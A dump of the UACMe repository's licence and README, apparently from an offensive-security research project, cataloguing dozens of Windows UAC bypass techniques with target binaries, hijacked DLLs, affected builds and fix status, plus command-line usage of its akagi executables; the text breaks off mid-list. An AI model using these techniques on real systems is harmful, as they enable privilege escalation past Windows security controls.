[
{
"path": ".gitattributes",
"content": "# Auto detect text files and perform LF normalization\n* text=auto\n"
},
{
"path": "LICENSE.md",
"content": "Copyright (c) 2014 - 2025, UACMe Project\n\nRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions are met:\n\n* Redistributions of source code must retain the above copyright notice, this\n list of conditions and the following disclaimer.\n\n* Redistributions in binary form must reproduce the above copyright notice,\n this list of conditions and the following disclaimer in the documentation\n and/or other materials provided with the distribution.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n"
},
{
"path": "README.md",
"content": "[](https://ci.appveyor.com/project/hfiref0x/uacme)\n\n\n# UACMe\nDefeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor. This project demonstrates various UAC bypass techniques and serves as an educational resource for understanding Windows security mechanisms.\n\n> ⚠️ **Warning**: This tool demonstrates security vulnerabilities that could be exploited maliciously. Use responsibly and only in controlled environments.\n\n# System Requirements\n\n* **Operating Systems**: Windows 7/8/8.1/10/11 (x86-32/x64, client, some methods however works on server version too)\n* **User Account**: Administrator account with UAC set on default settings\n\n## Usage\n\nRun the executable from command line using the following syntax:\n\n```\nakagi32.exe [Method_Number] [Optional_Command]\n```\nor\n```\nakagi64.exe [Method_Number] [Optional_Command]\n```\n### Parameters:\n* **Method_Number**: Number corresponding to the UAC bypass method (see Methods List below)\n* **Optional_Command**: Full path to an executable file to run with elevated privileges\n * If omitted, the program will launch an elevated command prompt (%systemroot%\\system32\\cmd.exe)\n\n### Examples:\n```\nakagi32.exe 23\nakagi64.exe 61\nakagi32.exe 23 c:\\windows\\system32\\calc.exe\nakagi64.exe 61 c:\\windows\\system32\\charmap.exe\n```\n\n\n> **Note**: Since version 3.5.0, all previously \"fixed\" methods are considered obsolete and have been removed. If you need them, use [v3.2.x branch](https://github.com/hfiref0x/UACME/tree/v3.2.x).\n\n\n Keys (click to expand/collapse)
\n\n1. Author: Leo Davidson\n * Type: Dll Hijack\n * Method: IFileOperation\n * Target(s): \\system32\\sysprep\\sysprep.exe\n * Component(s): cryptbase.dll\n * Implementation: ucmStandardAutoElevation \n * Works from: Windows 7 (7600)\n * Fixed in: Windows 8.1 (9600)\n * How: sysprep.exe hardened LoadFrom manifest elements\n * Code status: removed starting from v3.5.0 :tractor:\n2. Author: Leo Davidson derivative\n * Type: Dll Hijack\n * Method: IFileOperation\n * Target(s): \\system32\\sysprep\\sysprep.exe\n * Component(s): ShCore.dll\n * Implementation: ucmStandardAutoElevation\n * Works from: Windows 8.1 (9600)\n * Fixed in: Windows 10 TP (> 9600)\n * How: Side effect of ShCore.dll moving to \\KnownDlls\n * Code status: removed starting from v3.5.0 :tractor:\n3. Author: Leo Davidson derivative by WinNT/Pitou\n * Type: Dll Hijack\n * Method: IFileOperation\n * Target(s): \\system32\\oobe\\setupsqm.exe\n * Component(s): WdsCore.dll\n * Implementation: ucmStandardAutoElevation\n * Works from: Windows 7 (7600)\n * Fixed in: Windows 10 TH2 (10558)\n * How: Side effect of OOBE redesign\n * Code status: removed starting from v3.5.0 :tractor:\n4. Author: Jon Ericson, WinNT/Gootkit, mzH\n * Type: AppCompat\n * Method: RedirectEXE Shim\n * Target(s): \\system32\\cliconfg.exe\n * Component(s): -\n * Implementation: ucmShimRedirectEXE\n * Works from: Windows 7 (7600)\n * Fixed in: Windows 10 TP (> 9600)\n * How: Sdbinst.exe autoelevation removed, KB3045645/KB3048097 for rest Windows versions\n * Code status: removed starting from v3.5.0 :tractor:\n5. Author: WinNT/Simda\n * Type: Elevated COM interface\n * Method: ISecurityEditor\n * Target(s): HKLM registry keys\n * Component(s): -\n * Implementation: ucmSimdaTurnOffUac\n * Works from: Windows 7 (7600)\n * Fixed in: Windows 10 TH1 (10147)\n * How: ISecurityEditor interface method changed\n * Code status: removed starting from v3.5.0 :tractor:\n6. Author: Win32/Carberp\n * Type: Dll Hijack\n * Method: WUSA\n * Target(s): \\ehome\\mcx2prov.exe, \\system32\\migwiz\\migwiz.exe\n * Component(s): WdsCore.dll, CryptBase.dll, CryptSP.dll\n * Implementation: ucmWusaMethod\n * Works from: Windows 7 (7600)\n * Fixed in: Windows 10 TH1 (10147)\n * How: WUSA /extract option removed\n * Code status: removed starting from v3.5.0 :tractor:\n7. Author: Win32/Carberp derivative\n * Type: Dll Hijack\n * Method: WUSA\n * Target(s): \\system32\\cliconfg.exe\n * Component(s): ntwdblib.dll\n * Implementation: ucmWusaMethod\n * Works from: Windows 7 (7600)\n * Fixed in: Windows 10 TH1 (10147)\n * How: WUSA /extract option removed\n * Code status: removed starting from v3.5.0 :tractor:\n8. Author: Leo Davidson derivative by Win32/Tilon\n * Type: Dll Hijack\n * Method: IFileOperation\n * Target(s): \\system32\\sysprep\\sysprep.exe\n * Component(s): Actionqueue.dll\n * Implementation: ucmStandardAutoElevation\n * Works from: Windows 7 (7600)\n * Fixed in: Windows 8.1 (9600)\n * How: sysprep.exe hardened LoadFrom manifest\n * Code status: removed starting from v3.5.0 :tractor:\n9. Author: Leo Davidson, WinNT/Simda, Win32/Carberp derivative\n * Type: Dll Hijack\n * Method: IFileOperation, ISecurityEditor, WUSA\n * Target(s): IFEO registry keys, \\system32\\cliconfg.exe\n * Component(s): Attacker defined Application Verifier Dll\n * Implementation: ucmAvrfMethod\n * Works from: Windows 7 (7600)\n * Fixed in: Windows 10 TH1 (10147)\n * How: WUSA /extract option removed, ISecurityEditor interface method changed\n * Code status: removed starting from v3.5.0 :tractor:\n10. Author: WinNT/Pitou, Win32/Carberp derivative\n * Type: Dll Hijack\n * Method: IFileOperation, WUSA\n * Target(s): \\system32\\\\{New}or{Existing}\\\\{autoelevated}.exe, e.g. winsat.exe\n * Component(s): Attacker defined dll, e.g. PowProf.dll, DevObj.dll\n * Implementation: ucmWinSATMethod\n * Works from: Windows 7 (7600)\n * Fixed in: Windows 10 TH2 (10548) \n * How: AppInfo elevated application path control hardening\n * Code status: removed starting from v3.5.0 :tractor:\n11. Author: Jon Ericson, WinNT/Gootkit, mzH\n * Type: AppCompat\n * Method: Shim Memory Patch\n * Target(s): \\system32\\iscsicli.exe\n * Component(s): Attacker prepared shellcode\n * Implementation: ucmShimPatch\n * Works from: Windows 7 (7600)\n * Fixed in: Windows 8.1 (9600)\n * How: Sdbinst.exe autoelevation removed, KB3045645/KB3048097 for rest Windows versions\n * Code status: removed starting from v3.5.0 :tractor:\n12. Author: Leo Davidson derivative\n * Type: Dll Hijack\n * Method: IFileOperation\n * Target(s): \\system32\\sysprep\\sysprep.exe\n * Component(s): dbgcore.dll\n * Implementation: ucmStandardAutoElevation\n * Works from: Windows 10 TH1 (10240)\n * Fixed in: Windows 10 TH2 (10565)\n * How: sysprep.exe manifest updated\n * Code status: removed starting from v3.5.0 :tractor:\n13. Author: Leo Davidson derivative\n * Type: Dll Hijack\n * Method: IFileOperation\n * Target(s): \\system32\\mmc.exe EventVwr.msc\n * Component(s): elsext.dll\n * Implementation: ucmMMCMethod\n * Works from: Windows 7 (7600)\n * Fixed in: Windows 10 RS1 (14316)\n * How: Missing dependency removed\n * Code status: removed starting from v3.5.0 :tractor:\n14. Author: Leo Davidson, WinNT/Sirefef derivative\n * Type: Dll Hijack\n * Method: IFileOperation\n * Target(s): \\system\\credwiz.exe, \\system32\\wbem\\oobe.exe\n * Component(s): netutils.dll\n * Implementation: ucmSirefefMethod\n * Works from: Windows 7 (7600)\n * Fixed in: Windows 10 TH2 (10548)\n * How: AppInfo elevated application path control hardening\n * Code status: removed starting from v3.5.0 :tractor:\n15. Author: Leo Davidson, Win32/Addrop, Metasploit derivative\n * Type: Dll Hijack\n * Method: IFileOperation\n * Target(s): \\system32\\cliconfg.exe\n * Component(s): ntwdblib.dll\n * Implementation: ucmGenericAutoelevation\n * Works from: Windows 7 (7600)\n * Fixed in: Windows 10 RS1 (14316)\n * How: Cliconfg.exe autoelevation removed\n * Code status: removed starting from v3.5.0 :tractor:\n16. Author: Leo Davidson derivative\n * Type: Dll Hijack\n * Method: IFileOperation\n * Target(s): \\system32\\GWX\\GWXUXWorker.exe, \\system32\\inetsrv\\inetmgr.exe\n * Component(s): SLC.dll\n * Implementation: ucmGWX\n * Works from: Windows 7 (7600)\n * Fixed in: Windows 10 RS1 (14316)\n * How: AppInfo elevated application path control and inetmgr executable hardening\n * Code status: removed starting from v3.5.0 :tractor:\n17. Author: Leo Davidson derivative\n * Type: Dll Hijack (Import forwarding)\n * Method: IFileOperation\n * Target(s): \\system32\\sysprep\\sysprep.exe\n * Component(s): unbcl.dll\n * Implementation: ucmStandardAutoElevation2\n * Works from: Windows 8.1 (9600)\n * Fixed in: Windows 10 RS1 (14371)\n * How: sysprep.exe manifest updated\n * Code status: removed starting from v3.5.0 :tractor:\n18. Author: Leo Davidson derivative\n * Type: Dll Hijack (Manifest)\n * Method: IFileOperation\n * Target(s): \\system32\\taskhost.exe, \\system32\\tzsync.exe (any ms exe without manifest)\n * Component(s): Attacker defined\n * Implementation: ucmAutoElevateManifest\n * Works from: Windows 7 (7600)\n * Fixed in: Windows 10 RS1 (14371)\n * How: Manifest parsing logic reviewed\n * Code status: removed starting from v3.5.0 :tractor:\n19. Author: Leo Davidson derivative\n * Type: Dll Hijack\n * Method: IFileOperation\n * Target(s): \\system32\\inetsrv\\inetmgr.exe\n * Component(s): MsCoree.dll\n * Implementation: ucmInetMgrMethod\n * Works from: Windows 7 (7600)\n * Fixed in: Windows 10 RS1 (14376)\n * How: inetmgr.exe executable manifest hardening, MitigationPolicy->ProcessImageLoadPolicy->PreferSystem32Images\n * Code status: removed starting from v3.5.0 :tractor:\n20. Author: Leo Davidson derivative\n * Type: Dll Hijack\n * Method: IFileOperation\n * Target(s): \\system32\\mmc.exe, Rsop.msc\n * Component(s): WbemComn.dll\n * Implementation: ucmMMCMethod\n * Works from: Windows 7 (7600)\n * Fixed in: Windows 10 RS3 (16232)\n * How: Target requires wbemcomn.dll to be signed by MS\n * Code status: removed starting from v3.5.0 :tractor:\n21. Author: Leo Davidson derivative\n * Type: Dll Hijack\n * Method: IFileOperation, SxS DotLocal\n * Target(s): \\system32\\sysprep\\sysprep.exe\n * Component(s): comctl32.dll\n * Implementation: ucmSXSMethod\n * Works from: Windows 7 (7600)\n * Fixed in: Windows 10 RS3 (16232)\n * How: MitigationPolicy->ProcessImageLoadPolicy->PreferSystem32Images\n * Code status: removed starting from v3.5.0 :tractor:\n22. Author: Leo Davidson derivative\n * Type: Dll Hijack\n * Method: IFileOperation, SxS DotLocal\n * Target(s): \\system32\\consent.exe\n * Component(s): comctl32.dll\n * Implementation: ucmSXSMethod\n * Works from: Windows 7 (7600)\n * Fixed in: unfixed :see_no_evil:\n * How: -\n * Code status: added in v2.5.0\n23. Author: Leo Davidson derivative\n * Type: Dll Hijack\n * Method: IFileOperation\n * Target(s): \\system32\\pkgmgr.exe\n * Component(s): DismCore.dll\n * Implementation: ucmDismMethod\n * Works from: Windows 7 (7600)\n * Fixed in: unfixed :see_no_evil:\n * How: -\n * Code status: added in v2.5.1\n24. Author: BreakingMalware\n * Type: Shell API\n * Method: Environment variables expansion\n * Target(s): \\system32\\CompMgmtLauncher.exe\n * Component(s): Attacker defined\n * Implementation: ucmCometMethod\n * Works from: Windows 7 (7600)\n * Fixed in: Windows 10 RS2 (15031)\n * How: CompMgmtLauncher.exe autoelevation removed\n * Code status: removed starting from v3.5.0 :tractor:\n25. Author: Enigma0x3\n * Type: Shell API\n * Method: Registry key manipulation\n * Target(s): \\system32\\EventVwr.exe, \\system32\\CompMgmtLauncher.exe\n * Component(s): Attacker defined\n * Implementation: ucmHijackShellCommandMethod\n * Works from: Windows 7 (7600)\n * Fixed in: Windows 10 RS2 (15031)\n * How: EventVwr.exe redesigned, CompMgmtLauncher.exe autoelevation removed\n * Code status: removed starting from v3.5.0 :tractor:\n26. Author: Enigma0x3\n * Type: Race Condition\n * Method: File overwrite\n * Target(s): %temp%\\GUID\\dismhost.exe\n * Component(s): LogProvider.dll\n * Implementation: ucmDiskCleanupRaceCondition\n * Works from: Windows 10 TH1 (10240)\n * AlwaysNotify compatible\n * Fixed in: Windows 10 RS2 (15031)\n * How: File security permissions altered\n * Code status: removed starting from v3.5.0 :tractor:\n27. Author: ExpLife\n * Type: Elevated COM interface\n * Method: IARPUninstallStringLauncher\n * Target(s): Attacker defined\n * Component(s): Attacker defined\n * Implementation: ucmUninstallLauncherMethod\n * Works from: Windows 7 (7600)\n * Fixed in: Windows 10 RS3 (16199)\n * How: UninstallStringLauncher interface removed from COMAutoApprovalList\n * Code status: removed starting from v3.5.0 :tractor:\n28. Author: Exploit/Sandworm\n * Type: Whitelisted component\n * Method: InfDefaultInstall\n * Target(s): Attacker defined\n * Component(s): Attacker defined\n * Implementation: ucmSandwormMethod\n * Works from: Windows 7 (7600)\n * Fixed in: Windows 8.1 (9600)\n * How: InfDefaultInstall.exe removed from g_lpAutoApproveEXEList (MS14-060)\n * Code status: removed starting from v3.5.0 :tractor:\n29. Author: Enigma0x3\n * Type: Shell API\n * Method: Registry key manipulation\n * Target(s): \\system32\\sdclt.exe\n * Component(s): Attacker defined\n * Implementation: ucmAppPathMethod\n * Works from: Windows 10 TH1 (10240)\n * Fixed in: Windows 10 RS3 (16215)\n * How: Shell API update\n * Code status: removed starting from v3.5.0 :tractor:\n30. Author: Leo Davidson derivative, lhc645\n * Type: Dll Hijack\n * Method: WOW64 logger\n * Target(s): \\syswow64\\\\{any elevated exe, e.g wusa.exe}\n * Component(s): wow64log.dll\n * Implementation: ucmWow64LoggerMethod\n * Works from: Windows 7 (7600)\n * Fixed in: unfixed :see_no_evil:\n * How: -\n * Code status: added in v2.7.0\n31. Author: Enigma0x3\n * Type: Shell API\n * Method: Registry key manipulation\n * Target(s): \\system32\\sdclt.exe\n * Component(s): Attacker defined\n * Implementation: ucmSdcltIsolatedCommandMethod\n * Works from: Windows 10 TH1 (10240)\n * Fixed in: Windows 10 RS4 (17025)\n * How: Shell API / Windows components update\n * Code status: removed starting from v3.5.0 :tractor:\n32. Author: xi-tauw\n * Type: Dll Hijack\n * Method: UIPI bypass with uiAccess application\n * Target(s): \\Program Files\\Windows Media Player\\osk.exe, \\system32\\EventVwr.exe, \\system32\\mmc.exe\n * Component(s): duser.dll, osksupport.dll\n * Implementation: ucmUiAccessMethod\n * Works from: Windows 7 (7600)\n * Fixed in: unfixed :see_no_evil:\n * How: -\n * Code status: added in v2.7.1\n33. Author: winscripting.blog\n * Type: Shell API\n * Method: Registry key manipulation\n * Target(s): \\system32\\fodhelper.exe\n * Component(s): Attacker defined\n * Implementation: ucmShellRegModMethod\n * Works from: Windows 10 TH1 (10240)\n * Fixed in: unfixed :see_no_evil:\n * How: -\n * Code status: added in v2.7.2\n34. Author: James Forshaw\n * Type: Shell API\n * Method: Environment variables expansion\n * Target(s): \\system32\\svchost.exe via \\system32\\schtasks.exe\n * Component(s): Attacker defined\n * Implementation: ucmDiskCleanupEnvironmentVariable\n * Works from: Windows 8.1 (9600)\n * AlwaysNotify compatible\n * Fixed in: unfixed :see_no_evil:\n * How: -\n * Code status: added in v2.7.2\n35. Author: CIA & James Forshaw\n * Type: Impersonation\n * Method: Token Manipulations\n * Target(s): Autoelevated applications\n * Component(s): Attacker defined\n * Implementation: ucmTokenModification\n * Works from: Windows 7 (7600)\n * AlwaysNotify compatible, see note\n * Fixed in: Windows 10 RS5 (17686)\n * How: ntoskrnl.exe->SeTokenCanImpersonate additional access token check added\n * Code status: removed starting from v3.5.0 :tractor:\n36. Author: Thomas Vanhoutte aka SandboxEscaper\n * Type: Race condition\n * Method: NTFS reparse point & Dll Hijack\n * Target(s): wusa.exe, pkgmgr.exe\n * Component(s): Attacker defined\n * Implementation: ucmJunctionMethod\n * Works from: Windows 7 (7600)\n * Fixed in: unfixed :see_no_evil:\n * How: -\n * Code status: added in v2.7.4\n37. Author: Ernesto Fernandez, Thomas Vanhoutte\n * Type: Dll Hijack\n * Method: SxS DotLocal, NTFS reparse point\n * Target(s): \\system32\\dccw.exe\n * Component(s): GdiPlus.dll\n * Implementation: ucmSXSDccwMethod\n * Works from: Windows 7 (7600)\n * Fixed in: unfixed :see_no_evil:\n * How: -\n * Code status: added in v2.7.5\n38. Author: Clement Rouault\n * Type: Whitelisted component\n * Method: APPINFO command line spoofing\n * Target(s): \\system32\\mmc.exe\n * Component(s): Attacker defined\n * Implementation: ucmHakrilMethod\n * Works from: Windows 7 (7600)\n * Fixed in: unfixed :see_no_evil:\n * How: -\n * Code status: added in v2.7.6\n39. Author: Stefan Kanthak\n * Type: Dll Hijack\n * Method: .NET Code Profiler\n * Target(s): \\system32\\mmc.exe\n * Component(s): Attacker defined\n * Implementation: ucmCorProfilerMethod\n * Works from: Windows 7 (7600)\n * Fixed in: unfixed :see_no_evil:\n * How: -\n * Code status: added in v2.7.7\n40. Author: Ruben Boonen\n * Type: COM Handler Hijack\n * Method: Registry key manipulation\n * Target(s): \\system32\\mmc.exe, \\system32\\recdisc.exe\n * Component(s): Attacker defined\n * Implementation: ucmCOMHandlersMethod\n * Works from: Windows 7 (7600)\n * Fixed in: Windows 10 19H1 (18362)\n * How: Side effect of Windows changes\n * Code status: removed starting from v3.5.0 :tractor:\n41. Author: Oddvar Moe\n * Type: Elevated COM interface\n * Method: ICMLuaUtil\n * Target(s): Attacker defined\n * Component(s): Attacker defined\n * Implementation: ucmCMLuaUtilShellExecMethod\n * Works from: Windows 7 (7600)\n * Fixed in: unfixed :see_no_evil:\n * How: -\n * Code status: added in v2.7.9\n42. Author: BreakingMalware and Enigma0x3\n * Type: Elevated COM interface\n * Method: IFwCplLua\n * Target(s): Attacker defined\n * Component(s): Attacker defined\n * Implementation: ucmFwCplLuaMethod\n * Works from: Windows 7 (7600)\n * Fixed in: Windows 10 RS4 (17134)\n * How: Shell API update\n * Code status: removed starting from v3.5.0 :tractor:\n43. Author: Oddvar Moe derivative\n * Type: Elevated COM interface\n * Method: IColorDataProxy, ICMLuaUtil\n * Target(s): Attacker defined\n * Component(s): Attacker defined\n * Implementation: ucmDccwCOMMethod\n * Works from: Windows 7 (7600)\n * Fixed in: unfixed :see_no_evil:\n * How: -\n * Code status: added in v2.8.3\n44. Author: bytecode77\n * Type: Shell API\n * Method: Environment variables expansion\n * Target(s): Multiple auto-elevated processes\n * Component(s): Various per target\n * Implementation: ucmVolatileEnvMethod\n * Works from: Windows 7 (7600)\n * Fixed in: Windows 10 RS3 (16299)\n * How: Current user system directory variables ignored during process creation\n * Code status: removed starting from v3.5.0 :tractor:\n45. Author: bytecode77\n * Type: Shell API\n * Method: Registry key manipulation\n * Target(s): \\system32\\slui.exe\n * Component(s): Attacker defined\n * Implementation: ucmSluiHijackMethod\n * Works from: Windows 8.1 (9600)\n * Fixed in: Windows 10 20H1 (19041)\n * How: Side effect of Windows changes\n * Code status: removed starting from v3.5.0 :tractor:\n46. Author: Anonymous\n * Type: Race Condition\n * Method: Registry key manipulation\n * Target(s): \\system32\\BitlockerWizardElev.exe\n * Component(s): Attacker defined\n * Implementation: ucmBitlockerRCMethod\n * Works from: Windows 7 (7600)\n * Fixed in: Windows 10 RS4 (>16299)\n * How: Shell API update\n * Code status: removed starting from v3.5.0 :tractor:\n47. Author: clavoillotte & 3gstudent\n * Type: COM Handler Hijack\n * Method: Registry key manipulation\n * Target(s): \\system32\\mmc.exe\n * Component(s): Attacker defined\n * Implementation: ucmCOMHandlersMethod2\n * Works from: Windows 7 (7600)\n * Fixed in: Windows 10 19H1 (18362)\n * How: Side effect of Windows changes\n * Code status: removed starting from v3.5.0 :tractor:\n48. Author: deroko\n * Type: Elevated COM interface\n * Method: ISPPLUAObject\n * Target(s): Attacker defined\n * Component(s): Attacker defined\n * Implementation: ucmSPPLUAObjectMethod\n * Works from: Windows 7 (7600)\n * Fixed in: Windows 10 RS5 (17763)\n * How: ISPPLUAObject interface method changed \n * Code status: removed starting from v3.5.0 :tractor:\n49. Author: RinN\n * Type: Elevated COM interface\n * Method: ICreateNewLink\n * Target(s): \\system32\\TpmInit.exe\n * Component(s): WbemComn.dll\n * Implementation: ucmCreateNewLinkMethod\n * Works from: Windows 7 (7600)\n * Fixed in: Windows 10 RS1 (14393) \n * How: Side effect of consent.exe COMAutoApprovalList introduction\n * Code status: removed starting from v3.5.0 :tractor:\n50. Author: Anonymous\n * Type: Elevated COM interface\n * Method: IDateTimeStateWrite, ISPPLUAObject\n * Target(s): w32time service\n * Component(s): w32time.dll\n * Implementation: ucmDateTimeStateWriterMethod\n * Works from: Windows 7 (7600)\n * Fixed in: Windows 10 RS5 (17763)\n * How: Side effect of ISPPLUAObject interface change\n * Code status: removed starting from v3.5.0 :tractor:\n51. Author: bytecode77 derivative\n * Type: Elevated COM interface\n * Method: IAccessibilityCplAdmin\n * Target(s): \\system32\\rstrui.exe\n * Component(s): Attacker defined\n * Implementation: ucmAcCplAdminMethod\n * Works from: Windows 7 (7600)\n * Fixed in: Windows 10 RS4 (17134)\n * How: Shell API update\n * Code status: removed starting from v3.5.0 :tractor:\n52. Author: David Wells\n * Type: Whitelisted component\n * Method: AipNormalizePath parsing abuse\n * Target(s): Attacker defined\n * Component(s): Attacker defined\n * Implementation: ucmDirectoryMockMethod\n * Works from: Windows 7 (7600)\n * Fixed in: unfixed :see_no_evil:\n * How: -\t\t\n * Code status: added in v3.0.4\n53. Author: Emeric Nasi\n * Type: Shell API\n * Method: Registry key manipulation\n * Target(s): \\system32\\sdclt.exe\n * Component(s): Attacker defined\n * Implementation: ucmShellRegModMethod\n * Works from: Windows 10 (14393)\n * Fixed in: unfixed :see_no_evil:\n * How: -\n * Code status: added in v3.1.3\n54. Author: egre55\n * Type: Dll Hijack\n * Method: Dll path search abuse\n * Target(s): \\syswow64\\SystemPropertiesAdvanced.exe and other SystemProperties*.exe\n * Component(s): \\AppData\\Local\\Microsoft\\WindowsApps\\srrstr.dll\n * Implementation: ucmEgre55Method\n * Works from: Windows 10 (14393)\n * Fixed in: Windows 10 19H1 (18362)\n * How: SysDm.cpl!_CreateSystemRestorePage has been updated for secured load library call\n * Code status: removed starting from v3.5.0 :tractor:\n55. Author: James Forshaw\n * Type: GUI Hack\n * Method: UIPI bypass with token modification\n * Target(s): \\system32\\osk.exe, \\system32\\msconfig.exe\n * Component(s): Attacker defined\n * Implementation: ucmTokenModUIAccessMethod\n * Works from: Windows 7 (7600)\n * Fixed in: Windows 10 RS5 (17763), a part of patch, 2024 year\n * How: When integrity level of an UIAccess token is lowered, the UIAccess property is removed\n * Code status: added in v3.1.5\n56. Author: Hashim Jawad\n * Type: Shell API\n * Method: Registry key manipulation\n * Target(s): \\system32\\WSReset.exe\n * Component(s): Attacker defined\n * Implementation: ucmShellRegModMethod2\n * Works from: Windows 10 (17134)\n * Fixed in: Windows 11 (22000)\n * How: Windows components redesign\n * Code status: removed starting from v3.5.7 :tractor:\n57. Author: Leo Davidson derivative by Win32/Gapz\n * Type: Dll Hijack\n * Method: IFileOperation\n * Target(s): \\system32\\sysprep\\sysprep.exe\n * Component(s): unattend.dll\n * Implementation: ucmStandardAutoElevation\n * Works from: Windows 7 (7600)\n * Fixed in: Windows 8.1 (9600)\n * How: sysprep.exe hardened LoadFrom manifest elements\n * Code status: removed starting from v3.5.0 :tractor:\n58. Author: RinN\n * Type: Elevated COM interface\n * Method: IEditionUpgradeManager\n * Target(s): \\system32\\clipup.exe\n * Component(s): Attacker defined\n * Implementation: ucmEditionUpgradeManagerMethod\n * Works from: Windows 10 (14393)\n * Fixed in: unfixed :see_no_evil:\n * How: -\n * Code status: added in v3.2.0\n59. Author: James Forshaw\n * Type: AppInfo ALPC\n * Method: RAiLaunchAdminProcess and DebugObject\n * Target(s): Attacker defined\n * Component(s): Attacker defined\n * Implementation: ucmDebugObjectMethod\n * Works from: Windows 7 (7600)\n * Fixed in: unfixed :see_no_evil:\n * How: -\n * Code status: added in v3.2.3\n60. Author: Enigma0x3 derivative by WinNT/Glupteba\n * Type: Shell API\n * Method: Registry key manipulation\n * Target(s): \\system32\\CompMgmtLauncher.exe\n * Component(s): Attacker defined\n * Implementation: ucmGluptebaMethod\n * Works from: Windows 7 (7600)\n * Fixed in: Windows 10 RS2 (15063)\n * How: CompMgmtLauncher.exe autoelevation removed\n * Code status: removed starting from v3.5.0 :tractor:\n61. Author: Enigma0x3/bytecode77 derivative by Nassim Asrir\n * Type: Shell API\n * Method: Registry key manipulation\n * Target(s): \\system32\\slui.exe, \\system32\\changepk.exe\n * Component(s): Attacker defined\n * Implementation: ucmShellRegModMethod\n * Works from: Windows 10 (14393)\n * Fixed in: unfixed :see_no_evil:\n * How: -\t\t\n * Code status: added in v3.2.5\n62. Author: winscripting.blog\n * Type: Shell API\n * Method: Registry key manipulation\n * Target(s): \\system32\\computerdefaults.exe\n * Component(s): Attacker defined\n * Implementation: ucmShellRegModMethod\n * Works from: Windows 10 RS4 (17134)\n * Fixed in: unfixed :see_no_evil:\n * How: -\n * Code status: added in v3.2.6\n63. Author: Arush Agarampur\n * Type: Dll Hijack\n * Method: ISecurityEditor\n * Target(s): Native Image Cache elements\n * Component(s): Attacker defined\n * Implementation: ucmNICPoisonMethod\n * Works from: Windows 7 (7600)\n * Fixed in: unfixed :see_no_evil:\n * How: -\n * Code status: added in v3.2.7\n64. Author: Arush Agarampur\n * Type: Elevated COM interface\n * Method: IIEAxiAdminInstaller, IIEAxiInstaller2, IFileOperation\n * Target(s): IE add-on install cache\n * Component(s): Attacker defined\n * Implementation: ucmIeAddOnInstallMethod\n * Works from: Windows 7 (7600)\n * Fixed in: unfixed :see_no_evil:\n * How: -\n * Code status: added in v3.5.1\n65. Author: Arush Agarampur\n * Type: Elevated COM interface\n * Method: IWscAdmin\n * Target(s): Shell Protocol Hijack\n * Component(s): Attacker defined\n * Implementation: ucmWscActionProtocolMethod\n * Works from: Windows 7 (7600)\n * Fixed in: Windows 11 24H2 (26100)\n * How: Side effect of Windows changes\n * Code status: added in v3.5.2\n66. Author: Arush Agarampur\n * Type: Elevated COM interface\n * Method: IFwCplLua, Shell Protocol Hijack\n * Target(s): Shell protocol registry entry and environment variables\n * Component(s): Attacker defined\n * Implementation: ucmFwCplLuaMethod2\n * Works from: Windows 7 (7600)\n * Fixed in: Windows 11 24H2 (26100)\n * How: Side effect of Windows changes\n * Code status: added in v3.5.3\n67. Author: Arush Agarampur\n * Type: Shell API\n * Method: Shell Protocol Hijack\n * Target(s): \\system32\\fodhelper.exe\n * Component(s): Attacker defined\n * Implementation: ucmMsSettingsProtocolMethod\n * Works from: Windows 10 TH1 (10240)\n * Fixed in: unfixed :see_no_evil:\n * How: -\n * Code status: added in v3.5.4\n68. Author: Arush Agarampur\n * Type: Shell API\n * Method: Shell Protocol Hijack\n * Target(s): \\system32\\wsreset.exe\n * Component(s): Attacker defined\n * Implementation: ucmMsStoreProtocolMethod\n * Works from: Windows 10 RS5 (17763)\n * Fixed in: unfixed :see_no_evil:\n * How: -\n * Code status: added in v3.5.5\n69. Author: Arush Agarampur\n * Type: Shell API\n * Method: Environment variables expansion, Dll Hijack\n * Target(s): \\system32\\taskhostw.exe\n * Component(s): pcadm.dll\n * Implementation: ucmPcaMethod\n * Works from: Windows 7 (7600)\n * AlwaysNotify compatible\n * Fixed in: unfixed :see_no_evil:\n * How: -\n * Code status: added in v3.5.6\n70. Author: V3ded\n * Type: Shell API\n * Method: Registry key manipulation\n * Target(s): \\system32\\fodhelper.exe, \\system32\\computerdefaults.exe\n * Component(s): Attacker defined\n * Implementation: ucmShellRegModMethod3\n * Works from: Windows 10 (10240)\n * Fixed in: unfixed :see_no_evil:\n * How: -\n * Code status: added in v3.5.7\n71. Author: Arush Agarampur\n * Type: Dll Hijack\n * Method: ISecurityEditor\n * Target(s): Native Image Cache elements\n * Component(s): Attacker defined\n * Implementation: ucmNICPoisonMethod2\n * Works from: Windows 7 RTM (7600)\n * Fixed in: unfixed :see_no_evil:\n * How: -\n * Code status: added in v3.5.8\n72. Author: Emeric Nasi\n * Type: Dll Hijack\n * Method: Dll path search abuse\n * Target(s): \\syswow64\\msdt.exe, \\system32\\sdiagnhost.exe\n * Component(s): BluetoothDiagnosticUtil.dll\n * Implementation: ucmMsdtMethod\n * Works from: Windows 10 (10240)\n * Fixed in: unfixed :see_no_evil:\n * How: -\n * Code status: added in v3.5.9\n73. Author: orange_8361 and antonioCoco\n * Type: Shell API\n * Method: .NET deserialization\n * Target(s): \\system32\\mmc.exe EventVwr.msc\n * Component(s): Attacker defined\n * Implementation: ucmDotNetSerialMethod\n * Works from: Windows 7 RTM (7600)\n * Fixed in: unfixed :see_no_evil:\n * How: -\n * Code status: added in v3.6.0\n74. Author: zcgonvh\n * Type: Elevated COM interface\n * Method: 